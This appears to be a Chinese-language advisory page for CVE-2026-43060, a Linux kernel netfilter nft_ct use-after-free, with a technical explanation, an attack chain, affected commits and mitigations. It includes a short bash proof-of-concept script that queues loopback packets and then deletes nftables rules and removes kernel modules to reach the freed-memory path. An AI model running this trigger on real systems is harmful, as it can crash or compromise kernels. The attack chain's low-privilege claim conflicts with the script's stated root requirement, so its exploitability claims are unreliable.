CVE-2026-43060 CVSS 7.8 高危

CVE-2026-43060 Linux内核netfilter释放后重用漏洞

披露日期: 2026-05-05

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43060

漏洞类型

释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核netfilter子系统的nft_ct模块存在安全漏洞。当模块被移除时，位于nfqueue中排队的数据包可能仍持有对conntrack区域模板、超时策略或helper对象的引用。由于这些对象可能已被释放，移除模块会导致引用失效，可能引发释放后重用或系统崩溃。该漏洞通过在移除过程中丢弃这些排队的数据包来修复，以防止访问无效内存。

技术细节

漏洞原理在于Linux内核netfilter组件的生命周期管理不当。当数据包通过nfqueue入队时，它们会持有对conntrack相关对象（如模板、helper）的引用，这些引用通常存储在percpu区域。如果在数据包尚未处理完毕时，管理员卸载了相关内核模块（如nf_conntrack）或删除了nft规则，被引用的对象会被销毁。此时，队列中的数据包仍保留着指向已释放内存的指针。后续处理这些数据包时，内核将访问悬空指针，导致释放后重用（UAF），可能造成内核崩溃或权限提升。修复逻辑是在对象移除时主动丢弃依赖该对象的入队数据包。

攻击链分析

STEP 1

1. 本地访问

攻击者获得本地低权限用户访问权限。

STEP 2

2. 配置规则

配置nftables规则将数据包重定向到nfqueue，建立持有引用的条件。

STEP 3

3. 触发流量

发送网络流量使其进入nfqueue，数据包持有conntrack对象引用。

STEP 4

4. 模块移除

诱导或等待管理员移除相关内核模块或删除规则，释放被引用的内存。

STEP 5

5. 利用漏洞

内核尝试处理队列中的数据包，访问已释放的内存，导致崩溃或代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC Concept for CVE-2026-43060
# Needs root privileges to load modules and configure nftables

# 1. Setup environment
modprobe nf_tables
modprobe nfnetlink_queue

# 2. Create nft table and queue rule
nft add table ip filter
nft 'add chain ip filter input { type filter hook input priority 0 ; }'
nft add rule ip filter input queue num 0

# 3. Generate traffic (e.g., loopback ping) to enter the queue
ping -c 1 127.0.0.1 &
TRAFFIC_PID=$!

# 4. Wait for packets to be enqueued
sleep 0.5

# 5. Trigger the vulnerability path by removing the table/module
# In vulnerable versions, this leaves stale references.
nft delete table ip filter
rmmod nft_ct 2>/dev/null
rmmod nfnetlink_queue 2>/dev/null

# 6. Cleanup
wait $TRAFFIC_PID

影响范围

Linux Kernel < Commit 36eae0956f659e48d5366d9b083d9417f3263ddc

Linux Kernel < Commit 3da0b946835f33bf36b459ead764c61a761e689b

防御指南

临时缓解措施

限制本地用户对内核模块的加载和卸载权限；避免在系统运行高负载网络流量时进行内核模块或防火墙规则的变更操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表